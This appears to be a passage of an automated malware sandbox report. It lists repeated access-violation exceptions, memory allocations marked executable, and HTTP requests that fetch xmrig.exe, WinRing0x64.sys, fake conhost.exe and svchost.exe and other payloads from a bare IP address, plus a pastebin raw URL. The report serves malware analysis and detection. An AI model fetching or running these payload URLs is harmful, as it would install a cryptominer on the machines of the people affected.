0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://195.20.16.153/conhost.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://195.20.16.153/svchost.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://195.20.16.153/xmrig.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://195.20.16.153/WinRing0x64.sys
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://195.20.16.153/WatchDog.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://api.ip.sb/ip
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/ZRRRiwsq

Performs some HTTP requests (7 events)

request	GET http://195.20.16.153/conhost.exe
request	GET http://195.20.16.153/svchost.exe
request	GET http://195.20.16.153/xmrig.exe
request	GET http://195.20.16.153/WinRing0x64.sys
request	GET http://195.20.16.153/WatchDog.exe
request	GET https://api.ip.sb/ip
request	GET https://pastebin.com/raw/ZRRRiwsq

Allocates read-write-execute memory (usually to unpack itself) (50 out of 333 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00700000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74412000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dbb000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00582000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c6a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00741000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00742000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70df1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70c51000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70871000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e451000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e42e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e2ab000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00743000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00744000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00745000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c841000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
